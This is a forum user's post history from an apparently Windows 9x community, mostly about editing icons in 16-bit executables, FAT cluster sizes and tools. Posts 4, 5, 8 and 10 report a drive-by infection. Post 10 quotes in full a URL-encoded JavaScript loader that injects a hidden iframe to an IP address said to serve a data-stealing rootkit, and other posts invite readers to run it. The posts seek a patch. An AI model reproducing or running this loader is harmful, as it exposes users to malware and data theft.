Everything posted by eidenk

  1. I agree and I would personally be even more grateful if Anonymous could some day remember the extra setting, he talked about some time ago, which allows to set a custom size for 32bit resources.
  2. I bump it because that javascript exploit is very serious stuff IMO and most certainly affects all fully patched 9x systems. Can someone confirm that a 98SE or ME system with a fully patched IE 6 (SP1 + Maximum Decim Update) is vulnerable to that exploit ?
  3. Ok so, here is a version with 256 color bitmaps. I have edited the opened and closed folders to make them look like those in windows Explorer as an example : Winfile+
  4. Thanks erpdude but let's try to clarify : IE does not crash here but a file called vm3.exe is downloaded from a website in Russia and then executed on my machine simply by accessing the Alchemylab.com web site or just by running a local html page in which the above snippet of javascript is included. Copying/pasting this snippet into notepad, saving as html and then opening it with IE does the same job. Vm3.exe gets downloaded and executed but as it is not compatible with 9x OSes, it crashes itself immediately (IE is not affected) instead of hiding itself and sending personal data somewhere on the web as it is supposed to do on an NT OS. According to peeps on the sysinternals forum on which I also posted that stuff, vm3.exe is a data stealer rootkit, meaning that as soon as it is downloaded and executed on an NT OS, it hides itself from both the file manager and the process manager and attempts to steal personal data from you. Vm3.exe is actually quite irrelevant to my post. What I am interested in is the javascript exploit that allows this file to be downloaded and executed on my machine without any other interaction than running a web page on which there is this piece of script. Obviously this script in a modified form would be able to download and execute anything on my machine and possibly screw my system totally by a plethora of possible means. Code exists to erase BIOSes from within windows, damage hardware or totally screw the file system. Any such scenario and others are possible through this javascript exploit. It is not clear in your post whether this vm3.exe gets downloaded and executed or not on your XP machine with jscript.dll 5.7.0.5730. Bear in mind that, as it is a rootkit, you will not notice it is there (if it is there) through normal means. It is not clear either whether you actually tried Win98/ME + IE6 + jscript.dll 5.7.0.5730 on that page or just infer what you say from your test with XPSP2 + IE7.
No it's not faulty, it is infected with an exploit that at least affects 9x OSes + IE5.5 + JSCRIPT.DLL 5.6.0.8831 and very possibly NT systems also as vm3.exe seems to be targeted exclusively at those systems. Please could someone post this jscript.dll 5.7.0.5730 so that it can be tried here.
  5. How is this a problem? I haven't had a virus in years, because I'm not a luser that clicks "Yes" on every download/warning prompt. Also, viruses target newer Windows systems, and services that only exist on those. The only door in Win9x is the browser, and if that door is secured, you're safe. A hardware firewall gives even better protection. Actually there is no need to click yes on anything in order to get infected. Accessing a webpage with certain scripts on them is enough. If you save as html file the snippet I have posted in the first post of this topic and run the page with IE, a file named vm3.exe should be downloaded in your temp folder from a website in Russia without any interaction on your part. (You need to have javascript enabled in IE of course) You can try safely as this vm3.exe which is a rootkit targeting NT OSes and attempts to run as soon as it is downloaded, appears to crash immediately on a 9x OS.
  6. A well maintained system.
  7. Those files get opened as hexadecimal data so yes but not any easier than with an hex editor.
  8. Thanks dude, I hadn't followed up the latest developments of the service packs lately, but as I saw that this file was now included in most of them I tried it. I have just read kb919237 about JSCRIPT.DLL 5.6.0.8832. Unfortunately it does not seem to address any security issue over 5.6.0.8831, only a slow performance issue on some page with IE6, and the above script is able to download a file from a website and execute it on my machine with 5.6.0.8831. In the last six months or so I caught Gromozon/Link Optimizer, Bagle, Haxdoor, lsasss, PurityScan, CnsMin and now this one. All through IE and possibly all through the same flaw in jscript.dll. Has someone got JSCRIPT.DLL 5.6.0.8832 so that I could try it even though I am pretty sure it won't fix the hole. It should be in MESP Beta6 but I don't have it and the download link is dead.
  9. No problems. I have adopted your winfile as well. You've done marvels within the 16 color limitation of bitmaps btw. I could upload another one if you want in which the bitmaps are converted to 256 colors in case you'd want to further enhance them.
  10. OK so I had jscript.dll 5.6.0.8831 and this script dropped a vm3.exe from 81.95.146.98 in my temp folder which fortunately crashed immediately : <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!-- saved from url=(0026)http://www.alchemylab.com/ --> <script language=javascript> document.write( unescape( '%3C%69%66%72%61%6D%65%20%73%72%63%3D%20%68%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%34%36%2E%39%38%2F%69%6E%64%65%78%2E%68%74%6D%6C%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%20%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%6E%61%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69%66%72%61%6D%65%3E' ) ); </SCRIPT> I did update to jscript.dll 5.6.0.8833 which fixed the above problem but unfortunately it breaks stuff, namely I can't post correctly in boards anymore with it. On some boards, the edit field does not display at all anymore and here it displays the edit field but none of the formatting stuff at all. This happens with IE 5.5SP2 KB905915 on WinME. Any ideas ? Am I missing something in addition to jscript.dll 5.6.0.8833 so that I can post correctly in boards with it ? Does the problem exist with IE6 as well ?
  11. I guess you haven't properly read what I wrote. I have never said that a 32MB file from a CD would occupy 1GB on HDD.
  12. Data on CD is stored contiguously, i.e., without empty gaps. Fill a 700MB CD with 1kb files. Then copy that to HDD with a cluster size of 32kb and see how much disk space it occupies. 32 x 700MB or 22GB but in fact there will only be 700MB of data. All the rest is lost. This issue has nothing to do with overburning IMO or mode 2 CD or whatever of that sort but everything with the fact that there cannot be 2 files on the same cluster on HDD (at least on FAT32 dunno for NTFS). On CDs no space is lost, on HDD the space occupied by a file will be a multiple of the cluster size. If a file is the size of one cluster + 1 bit, it will occupy two clusters. Correct me if I am wrong.
  13. I haven't been on the forums lately so I have not witnessed any of the events that led to her ban, but I am not surprised she has been I must say. Certainly she has been an extremely valuable contributor to this forum (and I am the first to be admirative and grateful for the esdi_506.pdr fix she has done), but this does not allow someone to then, say, use the PM system to distribute links to illegal iso downloads for example, as she was doing, or trying to, two months ago, along with a moot argument that because MS does not sell an OS anymore, she is allowed to do whatever she wants with it on here. At that time I warned her and also spoke the voice of wisdom but she dismissed it all, saying I was not a moderator or something like that. Then xper closed the thread after a few more posts if I recall correctly. I am pretty sure that posts such as those she did at the time, would have led to an immediate ban if she had been a new poster. What has she done exactly to get banned then ? Has anyone round here witnessed it directly ?
  14. I am not sure VC++ 2005 will even do the job under XP as *I think* support for editing 16bit executables has been dropped from versions above 6. I am using VC++ 6 Standard Edition, which I bought on eBay for very cheap (£12 including P&P). VC++ 5 will do the same job but cannot be installed correctly on my ME OS (wants IE 4 to be installed), which does not matter for editing resources in executables as copying the folder containing the IDE over is enough. VC++ 4, and probably even earlier versions, will do but not so well as 5 and 6. Oddly enough it is not possible to edit 32 bit executables with those IDEs under 9x OSes. You need to use VC++ under an NT OS to be able to do that.
  15. Done. It's here : Winfile There is not much need for expertise for doing that btw. As easy as using Reshacker or eXescope.
  16. OK so, I have downloaded eXescope from Softpedia (version 6.41) and I have been unable to replace the icons of winfile.exe with others of a different color depth. I have been able to replace a 16 color bitmap with a 256 color one but then the modified winfile crashes systematically on launch. With VC++, I can do both of those things and the exe runs normally.
  17. No CreateMD5SSOHash function in Wininet.dll here. I am on WinME and I don't have MSN Messenger installed but at least it is an answer. I have looked again and I have found many RandSeed entries in my registry, 2 in HKLM and more than 20 in HKCU. All having to do with encryption apparently.
  18. Have you actually tried to replace bitmap or icon resources in NE executables with it ?
  19. Maybe you'll find yet more tweaks in there :
  20. The wikipedia page is interesting : File Allocation Table on Wikipedia Another interesting page : Fat 32 Formatter
  21. It's free and it can edit physical drives under 9x, meaning you can edit/backup/mess with the boot sector, partition tables, etc. with it. Plenty of other advanced features as well but this is the most immediately interesting one. HxD Homepage
  22. Ok, it is very easy to change resources in 16bit files if you have Visual C++. Here is one example : Sysedit with 256 color icons If you don't have VC++ and would like to change bitmap or icon resources in other 16bit files, provide the new resources and I'll do it for you.
  23. Have you tried KaiEdit ? It has line numbering, GoTo, S&R, favorites, tabbed multiple documents interface, opens big files (even binaries), syntax highlighting, and a quite unique and very useful vertical selection mode. It's only in German though and it lacks wordwrap unfortunately.
  24. The sysinternals utils for legacy systems are and will remain available from MS/Sysinternals : http://www.microsoft.com/technet/sysintern...ssExplorer.mspx http://www.microsoft.com/technet/sysintern...ies/Regmon.mspx http://www.microsoft.com/technet/sysintern...es/filemon.mspx
  25. Zoom Player - Support & Development Latest development information, suggest new features, troubleshoot problems and report bugs http://forum.inmatrix.com/index.php?showforum=2